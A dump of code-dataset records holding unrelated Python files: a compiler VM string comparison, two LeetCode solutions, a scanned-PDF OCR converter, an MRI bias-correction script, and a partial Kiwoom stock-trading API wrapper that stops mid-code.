cycle_body, return_counter=True)\n\n        # Full string equality section: push 0 onto the stack\n        commands.add(Label, eq_label)\n        commands.add(Push, 0)\n        commands.add(Jump, finish_label)\n\n        # String inequality section\n        commands.add(Label, not_eq_label)\n        # Load only the second character - the first one is already on the stack (see the loop body)\n        dbload(str2_start_pointer, counter, commands)\n        # Compare the characters with the < operator\n        commands.add(Compare, 2)\n        # Normalize the comparison result: 0|1 -> -1|1\n        commands.add(Push, 2)\n        commands.add(Mul)\n        commands.add(Push, 1)\n        commands.add(Sub)\n\n        commands.add(Label, finish_label)\n","repo_name":"petukhovv/compiler","sub_path":"src/Compiler/VM/Deep/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":12404,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"62"}
{"seq_id":"70870645958","text":"import collections\n\n\nclass Solution:\n    def countBalls(self, lowLimit: int, highLimit: int) -> int:\n        dt = collections.defaultdict(int)\n        for i in range(lowLimit, highLimit + 1):\n            x = 0\n            while i:\n                x += i % 10\n                i //= 10\n            dt[x] += 1\n        return max(dt.values())\n","repo_name":"foolishzhao/leetcode","sub_path":"python3/weekly-contest-226/_1742_Maximum_Number_of_Balls_in_a_Box/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
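# The strcmp epilogue above maps the 0/1 result of the < comparison to -1/1
# via r*2 - 1. The same arithmetic in plain Python (sketch):
def normalize_cmp(less_than: bool) -> int:
    return int(less_than) * 2 - 1  # False -> -1, True -> 1

# And a quick check for countBalls above: countBalls(1, 10) -> 2, since the
# digit sum 1 occurs for both 1 and 10 while every other sum occurs once.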
{"seq_id":"4282489605","text":"# create an input folder and place the input file \r\n# create an output folder\r\n# create an image folder \r\n# install the Tesseract application from this url \r\n# ( https://digi.bib.uni-mannheim.de/tesseract/tesseract-ocr-w64-setup-v5.0.0-alpha.20201127.exe )\r\n# Then using pip, install OpenCV and pytesseract\r\n# pip install PyMuPDF\r\n# pip install PyPDF2\r\nimport time\r\nstart_time = time.time()\r\nimport fitz\r\nfrom win32com.client.dynamic import Dispatch\r\nimport pytesseract\r\nimport PyPDF2\r\nimport os\r\n\r\ndef Converting_pages_pdf_into_image(input_folder,input_file):\r\n    os.chdir(input_folder)\r\n    file = input_file\r\n    pdf = fitz.open(file)\r\n    page_count = pdf.pageCount # getting the total no. of pages in the given pdf\r\n    for j in range(page_count):\r\n        page = pdf.loadPage(j)\r\n        zoom_x = 6.0 # horizontal zoom\r\n        zoom_y = 6.0 # vertical zoom\r\n        mat = fitz.Matrix(zoom_x, zoom_y) # zoom factor 6 in each dimension\r\n        pix = page.getPixmap(matrix = mat) # use 'mat' instead of the identity matrix\r\n        new_file = file[0:-4]+'_'+str(j)+'.jpg'\r\n        image_path='C://Users//anves//Downloads//pdf_search//images'\r\n        os.chdir(image_path)\r\n        pix.writeImage(new_file)\r\n    print('pages of pdf are converted to high quality images')\r\n    return image_path,input_file,page_count\r\n\r\n    \r\ndef converting_image_to_editable_pdf(image_path): \r\n    os.chdir(image_path)\r\n    \r\n    pytesseract.pytesseract.tesseract_cmd = r\"C:\\Program Files\\Tesseract-OCR\\tesseract.exe\"\r\n    for filename in os.listdir(image_path):\r\n        if filename.endswith(\".jpg\"):\r\n            Img =filename\r\n            pdf = pytesseract.image_to_pdf_or_hocr(Img, extension='pdf')\r\n            with open(Img[0:-4]+'.pdf', 'w+b') as f:\r\n                f.write(pdf)\r\n    print('each image is converted to pdf')\r\n\r\ndef creating_final_editable_pdf(image_path,output_folder,input_file):\r\n    os.chdir(image_path)\r\n    x = [a for a in os.listdir() if a.endswith(\".pdf\")]\r\n    \r\n    for pdf in x:\r\n        scale = PyPDF2.PdfFileReader(pdf)\r\n        page = scale.getPage(0)\r\n        page.scaleBy(0.175)\r\n        writer = PyPDF2.PdfFileWriter() # create a writer to save the updated results\r\n        writer.addPage(page)\r\n        with open(pdf , \"wb+\") as f:\r\n            writer.write(f)\r\n     \r\n    y = [a for a in os.listdir() if a.endswith(\".pdf\")]\r\n    merger = PyPDF2.PdfFileMerger()\r\n    for pdf in y:\r\n        merger.append(open(pdf, 'rb'))\r\n    os.chdir(output_folder)\r\n    with open(input_file , \"wb\") as fout:\r\n        merger.write(fout)\r\n    print('complete editable pdf is created')\r\n    return True\r\n    \r\n\r\ninput_folder ='C://Users//anves//Downloads//pdf_search//input'\r\noutput_folder = 'C://Users//anves//Downloads//pdf_search//output'\r\nfor filename in os.listdir(input_folder):\r\n    if filename.endswith(\".pdf\"):\r\n        input_file =filename\r\n        image_path,input_file,page_count = Converting_pages_pdf_into_image(input_folder,input_file)\r\n        converting_image_to_editable_pdf(image_path)\r\n        creating_final_editable_pdf(image_path, output_folder,input_file)\r\n\r\ndef doc_2_pdf(Input_File):\r\n    word = Dispatch('word.Application') # initiation of word application\r\n    word.Visible=False\r\n    input_file = Input_File\r\n    try:\r\n        wb = word.Documents.Open(input_file)\r\n        # Please mention the output destination path here \r\n        #/** the destination path should be different from input path**\r\n        output_file = 'C://Users//anves//Downloads//pdf_search//final//'+doc_pdf[0:-4]\r\n        wb.ExportAsFixedFormat2 (output_file,\r\n                               ExportFormat=17,\r\n                               OpenAfterExport=False,\r\n                               OptimizeFor=0, \r\n                               Range=0,\r\n                               Item=7,\r\n                               IncludeDocProps=True,\r\n                               KeepIRM=True,\r\n                               CreateBookmarks=1,\r\n                               DocStructureTags=True,\r\n                               BitmapMissingFonts=True,\r\n                               UseISO19005_1=True,\r\n                               OptimizeForImageQuality=True\r\n                               )\r\n        print(\"Bookmarking of the pdf is done.\")\r\n        wb.Close()\r\n        word.Quit()\r\n    except:\r\n        word.Quit()  \r\n    \r\ninput_folder ='C://Users//anves//Downloads//pdf_search//output'\r\nos.chdir(input_folder)\r\nfor filename in os.listdir(input_folder):\r\n    if filename.endswith(\".pdf\"):\r\n        doc_pdf =filename\r\n        Input_File = os.path.abspath(doc_pdf)\r\n        doc_2_pdf(Input_File)\r\n        #os.remove(input_file)\r\n\r\n        continue\r\n    else:\r\n        continue\r\n\r\n    \r\nprint(\"--- %s seconds ---\" % (time.time() - 
start_time))\r\nos._exit(00)\r\n\r\n\r\n","repo_name":"datasciencesridhar/dlp","sub_path":"scanned_pdf_to_editable_pdf.py","file_name":"scanned_pdf_to_editable_pdf.py","file_ext":"py","file_size_in_byte":5038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"4793506310","text":"import SimpleITK as sitk\nimport os\nimport sys\nfrom data_generation.preprocess import correct_bias\nimport shutil\n\nif __name__ == \"__main__\":\n subjects_folder = '/home/bella/Phd/data/brain/HASTE/HASTE/'\n out_folder = '/home/bella/Phd/data/brain/HASTE/HASTE_bfc/'\n all_in_one_dir = False\n vol_filename = 'volume.nii.gz'\n truth_file = 'truth.nii'\n\n if(all_in_one_dir == True):\n files = os.listdir(subjects_folder)\n for file in files:\n print('processing file: ' + file)\n correct_bias(os.path.join(subjects_folder,file), os.path.join(out_folder, file))\n else:\n dirs = os.listdir(subjects_folder)\n for dir in dirs:\n print('processing dir: ' + dir)\n out_dir_path = os.path.join(out_folder, dir)\n if(os.path.exists(out_dir_path)):\n continue\n\n os.mkdir(out_dir_path)\n\n correct_bias(os.path.join(subjects_folder, dir, vol_filename), os.path.join(out_dir_path, vol_filename))\n truth_path = os.path.join(subjects_folder,dir,truth_file)\n if(not os.path.exists(truth_path)):\n truth_path = os.path.join(subjects_folder,dir,'truth.nii.gz')\n shutil.copyfile(truth_path, os.path.join(out_dir_path,truth_file))","repo_name":"AnnaLevch/fetal_mr","sub_path":"data_generation/BFC_preprocessing.py","file_name":"BFC_preprocessing.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"30907030917","text":"#!/usr/bin/env python\n# coding=utf-8\n\"\"\"\n@desc:\n@author: Luo.lu\n@date: 2018-11-2\n\n\"\"\"\nclass Solution:\n def findContentChildren(self, g, s):\n \"\"\"\n :type g: List[int]\n :type s: List[int]\n :rtype: int\n \"\"\"\n g = sorted(g)\n s = sorted(s)\n i = 0\n count = 0\n for item in g:\n while i < len(s) and item > s[i]:\n i += 1\n if i == len(s):\n break\n count += 1\n i += 1\n return count\n\n\nif __name__ == '__main__':\n A = Solution()\n print(A.findContentChildren([10,9,8,7], [5,6,7,8]))\n","repo_name":"mashpolo/leetcode_ans","sub_path":"400/leetcode455/ans.py","file_name":"ans.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"11588120817","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QAxContainer import *\nfrom PyQt5.QtCore import *\nimport sqlite3\nimport pandas as pd\nimport time\nimport sys, os\nfrom datetime import datetime\n# import matplotlib.pyplot as plt\n\n#change the current working directory\n# path = r'D:\\myprojects\\TradingDB' + '\\\\' + datetime.today().strftime('%Y-%m-%d')\npath = r'D:\\myprojects\\TradingDB'\nif not os.path.exists(path):\n os.mkdir(path)\nos.chdir(path) \n\nTR_REQ_TIME_INTERVAL = 0.2\n\nclass Kiwoom(QAxWidget):\n def __init__(self):\n super().__init__()\n \n self.reset()\n self.OCX_available() \n self._event_handlers()\n self._login() \n self.account_info() \n self.all_stocks = self.stock_ticker() \n\n def OCX_available(self):\n self.setControl('KHOPENAPI.KHOpenAPICtrl.1')\n\n def reset(self):\n self.account_num = 0\n self.remaining_data = False\n self.fidlist = []\n self.tr_data = {}\n self.stockcode_non_realtime = 0\n self.requesting_time_unit = ''\n self.starting_time, self.lapse, self.SAVING_INTERVAL = 
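# Quick check for the greedy findContentChildren above: with greeds
# [10, 9, 8, 7] and cookies [5, 6, 7, 8], sorting gives g = [7, 8, 9, 10]
# and s = [5, 6, 7, 8]; child 7 takes cookie 7, child 8 takes cookie 8,
# and no cookie is left for child 9, so the printed answer is 2.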
time.time(), 0, 60*10 \n self.fids_dict = {\n '주식시세' : {10:'현재가', 11:'전일대비', 12:'등락율', 27:'매도호가', 28:'매수호가',\n 13:'누적거래량', 14:'누적거래대금', 16:'시가', 17:'고가', 18:'저가', 25:'전일대비기호',\n 26:'전일거래량대비', 29:'거래대금증감', 30:'전일거래량대비' ,31:'거래회전율', 23:'거래비용',\n 311:'시가총액(억)', 567:'상한가발생시간', 568:'하한가발생시간'},\n '주식체결' : {20:'체결시간', 10:'현재가', 11:'전일대비', 12:'등락율', 27:'매도호가', 28:'매수호가',\n 15:'거래량', 13:'누적거래량', 14:'누적거래대금', 16:'시가', 17:'고가', 18:'저가', 25:'전일대비기호',\n 26:'전일거래량대비', 29:'거래대금증감', 30:'전일거래량대비', 31:'거래회전율', 32:'거래비용', 288:'체결강도',\n 311:'시가총액(억)', 290:'장구분', 691:'KO접근도', 567:'상한가발생시간', 568:'하한가발생시간', 851:'전일동시간거래량비율'},\n '주문체결' : {9201:'계좌번호', 9203:'주문번호', 9205:'관리자사번', 9001:'종목코드,업종코드', 912:'주문업무분류',\n 913:'주문상태', 302:'종목명', 900:'주문수량', 901:'주문가격', 902:'미체결수량', 903:'체결누계금액',\n 904:'원주문번호', 905:'주문구분', 906:'매매���분', 907:'매도수구분', 908:'주문/체결시간', 909:'체결번호', \n 910:'체결가', 911:'체결량', 10:'현재가', 27:'매도호가', 28:'매수호가', 914:'단위체결가', 915:'단위체결량',\n 938:'당일매매수수료', 939:'당일매매세금', 919:'거부사유', 920:'화면번호', 921:'터미널번호', 922:'신용구분', 923:'대출일'},\n '잔고수신' : {9201:'계좌번호', 9203:'주문번호', 9001:'종목코드', 913:'주문상태', 302:'종목명', 900:'주문수량', 901:'주문가격', \n 902:'미체결수량', 903:'체결누계금액', 904:'원주문번호', 905:'주문구분', 906:'매매구분', 907:'매도수구분', \n 908:'주문/체결시간', 9009:'체결번호', 910:'체결가', 911:'체결량', 10:'현재가', 27:'(최우선)매도호가', \n 28:'(최우선)매수호가', 914:'단위체결가', 915:'단위체결량', 919:'거부사유', 920:'화면번호', 917:'신용구분', \n 916:'대출일', 930:'보유수량', 931:'매입단가', 932:'총매입가', 933:'주문가능수량', 945:'당일순매수수량', \n 946:'매도/매수구분', 950:'당일총매도손일', 951:'예수금', 307:'기준가', 8019:'손익율', 957:'신용금액', 958:'신용이자',\n 918:'만기일', 990:'당일실현손익(유가)', 991:'당일실현손익률(유가)', 993:'당일실현손익률(신용)', 397:'파생상품거래단위',\n 305:'상한가', 306:'하한가'},\n 'opt10079' : ['현재가', '거래량', '체결시간', '시가', '고가', '저가', '수정주가구분', '수정비율', '대업종구분', '소업종구분',\n '종목정보', '수정주가이벤트', '전일종가'],\n 'opt10080' : ['현재가', '거래량', '체결시간', '시가', '고가', '저가', '수정주가구분', '수정비율', '대업종구분', '소업종구분', \n '종목정보', '수정주가이벤트', '전일종가'],\n 'opt10081' : ['종목코드', '현재가', '거래량', '거래대금', '일자', '시가', '고가', '저가', '수정주가구분', '수정비율', '대업종구분',\n '소업종구분', '종목정보', '수정주가이벤트', '전일종가'],\n 'OPTKWFID' : ['종목코드', '종목명', '현재가', '기준가', '전일대비', '전일대비기호', '등락율', '거래량', '거래대금', '체결량', \n '체결강도', '전일거래량대비', '매도호가', '매수호가', '매도1차호가', '매도2차호가', '매도3차호가', '매도4차호가',\n '매도5차호가', '매수1차호가', '매수2차호가', '매수3차호가', '매수4차호가', '매수5차호가', '상한가', '하한가', '시가',\n '고가', '저가', '종가', '체결시간', '예상체결가', '예상체결량', '자본금', '액면가', '시가총액', '주식수', '호가시간',\n '일자', '우선매도잔량', '우선매수잔량', '우선매도건수', '우선매수건수', '총매도잔량', '총매수잔량', '총매도건수', \n '총매수건수', '패리티', '기어링', '손익분기', '자본지지', 'ELW행사가', '전환비율', 'ELW만기일', '미결제약정', '미결제전일대비',\n '이론가', '내재변동성', '델타', '감마', '쎄타', '베가', '로']\n }\n self.orders_dict = {\n '호가구분' : {'00':'지정가', '03':'시장가', '05':'조건부지정가', '06':'최유리지정가', '07':'최우선지정가', '10':'지정가IOC', '13':'시장가IOC', \n '16':'최유리IOC', '20':'지정가FOK', '23':'시장가FOK', '26':'최유리FOK', '61':'장전시간외종가', '62':'시간외단일가매매', '81':'장후시간외종가'},\n '주문리턴' : {0:'주문성공', -308:'1초5회이상주문에러'}\n }\n \n def _login(self):\n self.dynamicCall('CommConnect')\n self._event_loop_exec('login_loop')\n\n def _event_handlers(self):\n self.OnEventConnect.connect(self._comm_connect_event)\n self.OnReceiveTrData.connect(self._receive_tr_data)\n self.OnReceiveRealData.connect(self._receive_real_data)\n self.OnReceiveMsg.connect(self._receive_msg)\n self.OnReceiveChejanData.connect(self._receive_chejan_data)\n \n def _comm_connect_event(self, err_code):\n if err_code == 0:\n print('Successfully logged in')\n \n self._event_loop_exit('login_loop')\n print('Login loop exited')\n \n def data_from_sql(self, tablename, filename):\n with sqlite3.connect(filename) as file:\n return 
pd.read_sql(f'SELECT * FROM [{tablename}]', file) \n \n def _data_to_sql(self, tablename, filename, df):\n with sqlite3.connect(filename) as file:\n df.to_sql(tablename, file, if_exists='append')\n \n def account_info(self):\n #GetLoginInfo() takes its argument as a list form. Put all the input values in []\n self.account_num = self.dynamicCall('GetLoginInfo(QString)', ['ACCNO']).strip(';')\n print(self.account_num)\n\n def stock_ticker(self):\n #GetCodeListByMarket() takes its argument as a list form. Put all the input values in []\n response = self.dynamicCall('GetCodeListByMarket(QString)', ['']) # '' means all markets. '0' means KOSPI. '10' means KOSDAQ.\n tickers = response.split(';')\n stock_list = {}\n for ticker in tickers:\n stock = self.dynamicCall('GetMasterCodeName(QString)', [ticker])\n stock_list[ticker] = [stock]\n stock_list[stock] = ticker\n return stock_list\n \n def set_input_value(self, tr_name, tr_value):\n self.dynamicCall('SetInputValue(QString, QString)', tr_name, tr_value)\n \n def set_real_data(self, scrno, codelist, fidlist, opttype):\n for idx, code in enumerate(codelist):\n print(f'\\n\\nrequesting data of {code}')\n self.dynamicCall('SetRealReg(QString, QString, QString, QString)', f'00{idx+100}', code, fidlist, opttype)\n \n self._event_loop_exec('real')\n \n def set_order(self, rqname, scrno, accno, ordertype, code, qty, price, hogagb, orgorderno):\n #SendOrder() takes its argument as a list form. Put all the input values in []\n self.dynamicCall('SendOrder(QString, QString, QString, int, QString, int, int, QString, QString)', [rqname, scrno, accno, ordertype, code, qty, price, hogagb, orgorderno])\n \n self._event_loop_exec('order')\n \n def comm_rq_data(self, rqname, trcode, prenext, scrno):\n self.dynamicCall('CommRQData(QString, QString, int, QString)', rqname, trcode, prenext, scrno)\n self._event_loop_exec('tr')\n \n def comm_kw_rq_data(self, arrcode, prenext, codecnt, typeflag=0, rqname='OPTKWFID', scrno='0005'):\n self.dynamicCall('CommKwRqData(QString, int, int, int, QString, QString)', arrcode, prenext, codecnt, typeflag, rqname, scrno)\n self._event_loop_exec('big')\n \n def _event_loop_exec(self, loopname):\n exec(f'self.{loopname} = QEventLoop()')\n exec(f'self.{loopname}.exec_()')\n \n def _event_loop_exit(self, loopname):\n exec(f'self.{loopname}.exit()')\n \n def _receive_tr_data(self, scrno, rqname, trcode, recordname, prenext, unused1, unused2, unused3, unused4):\n if prenext == 2:\n self.remaining_data = True\n elif prenext == 0:\n self.remaining_data = False\n \n print('scrno, rqname, trcode, recordname, prenext, unused1, unused2, unused3, unused4: ->in _receive_tr_data\\n',\\\n scrno, rqname, trcode, recordname, prenext, unused1, unused2, unused3, unused4) \n\n if rqname == 'OPT10081':\n self._opt10081(rqname, trcode)\n elif rqname == 'OPT10079':\n self._opt10079(rqname, trcode)\n elif rqname == 'OPT10080':\n self._opt10080(rqname, trcode)\n elif rqname == 'OPTKWFID':\n self._optkwfid(trcode)\n\n # try:\n # self._event_loop_exit('tr')\n\n # except AttributeError:\n # pass\n \n def _receive_real_data(self, code, realtype, realdata):\n if realtype == '주식시세':\n self._realtype_stock_status(code) \n elif realtype == '주식체결':\n self._realtype_stock_made(code) \n elif realtype == '주문체결':\n self._realtype_order_made(code)\n \n def _receive_msg(self, scrno, rqname, trcode, msg):\n print('\\n\\nscrno, rqname, trcode, msg: ->in _receive_msg\\n', scrno, rqname, trcode, msg)\n add = {}\n stock = self.all_stocks[self.stockcode_non_realtime][0]\n 
msg_trimmed = msg.split()\n msg_trimmed[0] = msg_trimmed[0].strip('[]')\n add[datetime.now().strftime('%H:%M:%S')] = [stock, trcode, msg_trimmed[0], msg_trimmed[1], msg_trimmed[2]]\n self.tr_data['주문메세지'] = add\n # df_name, df = self._df_generator('주문메세지', self.stockcode_non_realtime, add)\n # self._data_to_sql('주문메세지', df_name+'.db', df)\n \n # try:\n # self._event_loop_exit('real')\n # except AttributeError:\n # pass\n \n def _receive_chejan_data(self, gubun, itemcnt, fidlist):\n print('gubun: -> in _receive_chejan_data\\n', gubun)\n if gubun == 0: #order placed and made \n self._real_chejan_placed_made(itemcnt, fidlist)\n elif gubun == 1:\n self._domestic_balance_change(itemcnt, fidlist)\n if fidlist in self.orders_dict['호가구분'].keys():\n add = {}\n for fid in fidlist:\n add[self.orders_dict['호가구분'][fid]] = self._get_chejan_data(fid)\n print('\\n\\nhogagubun in receive chejan data: ', add)\n \n def _domestic_balance_change(self, itemcnt, fidlist):\n print('\\n\\itemcnt, fidlist: -> in _domestic_balance_chanage\\n', itemcnt, fidlist)\n for item in itemcnt:\n for fid in fidlist:\n print('\\nchejan data: -> in _domestic_balance_chanage:\\n', self._get_chejan_data(fid))\n \n def _realtype_stock_status(self, code):\n add= {}\n fidlist = self.fids_dict['주식시세']\n\n for fid, fidname in fidlist.items():\n add[fidname] = [self._get_comm_real_data(code, fid)]\n \n self.requesting_time_unit = ''\n df_name, df = self._df_generator('주식시세', code, add)\n self.lapse = time.time()\n if len(df) > 10 or self.lapse - self.starting_time > self.SAVING_INTERVAL:\n self.starting_time = time.time()\n self._data_to_sql('주식시세', df_name+'.db', df) \n self.tr_data[df_name] = pd.DataFrame()\n \n def _realtype_stock_made(self, code): \n add= {}\n fidlist = self.fids_dict['주식체결']\n\n for fid, fidname in fidlist.items():\n add[fidname] = [self._get_comm_real_data(code, fid)]\n \n self.requesting_time_unit = ''\n df_name, df = self._df_generator('주식체결', code, add)\n self.lapse = time.time()\n if len(df) > 10 or self.lapse - self.starting_time > self.SAVING_INTERVAL:\n self.starting_time = time.time()\n self._data_to_sql('주식체결', df_name+'.db', df)\n self.tr_data[df_name] = pd.DataFrame()\n \n def _realtype_order_made(self, code):\n add= {}\n fidlist = self.fids_dict['주문체결']\n\n for fid, fidname in fidlist.items():\n add[fidname] = [self._get_comm_real_data(code, fid)]\n\n self.requesting_time_unit = ''\n df_name, df = self._df_generator('주문체결', code, add) \n self.lapse = time.time()\n if len(df) > 10 or self.lapse - self.starting_time > self.SAVING_INTERVAL:\n self.starting_time = time.time()\n self._data_to_sql('주문체결', df_name+'.db', df)\n self.tr_data[df_name] = pd.DataFrame()\n\n def _df_generator(self, realtype, stockcode, data):\n print('\\n\\nrealtype, stockcode, stock, data in df_generator: \\n', realtype, stockcode, self.all_stocks[stockcode][0], data)\n df_name = self.all_stocks[stockcode][0]+'_'+realtype+self.requesting_time_unit+'_'+datetime.today().strftime('%Y_%m_%d')\n if df_name in self.tr_data.keys():\n self.tr_data[df_name] = self.tr_data[df_name].append(pd.DataFrame(data), ignore_index=True)\n return df_name, self.tr_data[df_name]\n else:\n self.tr_data[df_name] = pd.DataFrame(data)\n return df_name, self.tr_data[df_name]\n \n def _get_comm_real_data(self, code, fid):\n return self.dynamicCall('GetCommRealData(QString, int)', code, fid) \n\n def _get_chejan_data(self, fid):\n return self.dynamicCall('GetChejanData(int)', fid)\n\n def _get_repeat_cont(self, trcode, recordname): \n print('\\nGetRepeatCnt: 
', self.dynamicCall('GetRepeatCnt(QString, QString)', trcode, recordname)) \n return self.dynamicCall('GetRepeatCnt(QString, QString)', trcode, recordname)\n \n def _real_chejan_placed_made(self, itemcnt, fidlist): \n print('\\n\\itemcnt, fidlist: -> in_real_chejan_placed_made\\n', itemcnt, fidlist)\n \n for idx in itemcnt:\n for fid in fidlist:\n print('\\n\\chejan data: ->in _real_chejan_placed_made\\n', self._get_chejan_data(fid))\n \n\n def _opt10080(self, rqname, trcode):\n data_cnt = self._get_repeat_cont(trcode, '주식분봉차트')\n\n add = {}\n for idx in range(data_cnt):\n for key in self.fids_dict['opt10080']:\n add[key] = [self._get_comm_data(trcode, rqname, idx, key)]\n\n # add['현재가'] = [self._get_comm_data(trcode, rqname, idx, '현재가')]\n # add['거래량'] = [self._get_comm_data(trcode, rqname, idx, '거래량')]\n # add['체결시간'] = [self._get_comm_data(trcode, rqname, idx, '체결시간')]\n # add['시가'] = [self._get_comm_data(trcode, rqname, idx, '시가')]\n # add['고가'] = [self._get_comm_data(trcode, rqname, idx, '고가')]\n # add['저가'] = [self._get_comm_data(trcode, rqname, idx, '저가')]\n # add['수정주가구분'] = [self._get_comm_data(trcode, rqname, idx, '수정주가구분')]\n # add['수정비율'] = [self._get_comm_data(trcode, rqname, idx, '수정비율')]\n # add['대업종구분'] = [self._get_comm_data(trcode, rqname, idx, '대업종구분')]\n # add['소업종구분'] = [self._get_comm_data(trcode, rqname, idx, '소업종구분')]\n # add['종목정보'] = [self._get_comm_data(trcode, rqname, idx, '종목정보')]\n # add['수정주가이벤트'] = [self._get_comm_data(trcode, rqname, idx, '수정주가이벤트')]\n # add['전일종가'] = [self._get_comm_data(trcode, rqname, idx, '전일종가')]\n \n \n df_name, df = self._df_generator('주식분봉차트', self.stockcode_non_realtime, add)\n self._data_to_sql('주식분봉차트', df_name+'.db', df) \n print('\\n\\n_opt10080 request received:\\n', self.tr_data[df_name]) \n self.tr_data[df_name] = pd.DataFrame()\n \n def _opt10081(self, rqname, trcode):\n data_cnt = self._get_repeat_cont(trcode, '주식일봉차트')\n\n add = {}\n for idx in range(data_cnt):\n for key in self.fids_dict['opt10081']:\n add[key] = [self._get_comm_data(trcode, rqname, idx, key)] \n\n # add['일자'] = [self._get_comm_data(trcode, rqname, idx, '일자')]\n # add['시가'] = [self._get_comm_data(trcode, rqname, idx, '시가')]\n # add['고가'] = [self._get_comm_data(trcode, rqname, idx, '고가')]\n # add['저가'] = [self._get_comm_data(trcode, rqname, idx, '저가')]\n # add['현재가'] = [self._get_comm_data(trcode, rqname, idx, '현재가')]\n # add['거래량'] = [self._get_comm_data(trcode, rqname, idx, '거래량')]\n # add['거래대금'] = [self._get_comm_data(trcode, rqname, idx, '거래대금')]\n\n # for idx, key in enumerate(add.keys()):\n # if idx == 0:\n # continue \n # add[key] = int(add[key][0]) \n \n df_name, df = self._df_generator('주식일봉차트', self.stockcode_non_realtime, add)\n self._data_to_sql('주식일봉차트', df_name+'.db', df) \n print('\\n\\n_opt10081 request received:\\n', self.tr_data[df_name]) \n self.tr_data[df_name] = pd.DataFrame()\n\n def _opt10079(self, rqname, trcode):\n data_cnt = self._get_repeat_cont(trcode, '주식틱차트')\n \n add = {}\n for idx in range(data_cnt):\n for key in self.fids_dict['opt10079']:\n add[key] = [self._get_comm_data(trcode, rqname, idx, key)] \n\n # add['체결시간'] = [self._get_comm_data(trcode, rqname, idx, '체결시간')]\n # add['시가'] = [self._get_comm_data(trcode, rqname, idx, '시가')]\n # add['시가'] = [self._get_comm_data(trcode, rqname, idx, '시가')]\n # add['고가'] = [self._get_comm_data(trcode, rqname, idx, '고가')]\n # add['저가'] = [self._get_comm_data(trcode, rqname, idx, '저가')]\n # add['현재가'] = [self._get_comm_data(trcode, rqname, idx, '현재가')]\n # add['거래량'] = 
[self._get_comm_data(trcode, rqname, idx, '거래량')]\n \n # for idx, key in enumerate(add.keys()):\n # if idx == 0:\n # continue \n # add[key] = int(add[key][0]) \n\n df_name, df = self._df_generator('주식틱차트', self.stockcode_non_realtime, add)\n self._data_to_sql('주식틱차트', df_name+'.db', df) \n print('\\n\\n_opt10079 request received:\\n', self.tr_data[df_name]) \n self.tr_data[df_name] = pd.DataFrame()\n \n def _optkwfid(self, trcode):\n data_cnt = self._get_repeat_cont(trcode, '관심종목')\n \n add= {}\n for idx in range(data_cnt):\n for key in self.fids_dict['OPTKWFID']:\n add[key] = [self._get_comm_data(trcode, rqname, idx, key)]\n\n # add['종목코드'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '종목코드')] #0\n # add['종목명'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '종목명')] #1\n # add['현재가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '현재가')]\n # add['기준가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '기준가')]\n # add['전일대비'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '전일대비')]\n # add['전일대비기호'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '전일대비기호')]\n # add['등락율'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '등락율')] #6\n # add['거래량'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '거래량')]\n # add['거래대금'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '거래대금')]\n # add['체결량'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '체결량')]\n # add['체결강도'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '체결강도')] #10\n # add['전일거래량대비'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '전일거래량대비')] #11\n # add['매도호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매도호가')]\n # add['매수호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매수호가')]\n # add['매도1차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매도1차호가')]\n # add['매도2차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매도2차호가')]\n # add['매도3차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매도3차호가')]\n # add['매도4차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매도4차호가')]\n # add['매도5차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매도5차호가')]\n # add['매수1차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매수1차호가')]\n # add['매수2차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매수2차호가')]\n # add['매수3차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매수3차호가')]\n # add['매수4차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매수4차호가')]\n # add['매수5차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매수5차호가')]\n # add['상한가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '상한가')]\n # add['하한가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '하한가')]\n # add['시가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '시가')]\n # add['고가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '고가')]\n # add['저가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '저가')]\n # add['종가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '종가')]\n # add['체결시간'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '체결시간')]\n # add['예상체결가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '예상체결가')]\n # add['예상체결량'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '예상체결량')]\n # add['자본금'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '자본금')]\n # add['액면가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '액면가')]\n # add['시가총액'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '시가총액')]\n # add['주식수'] = 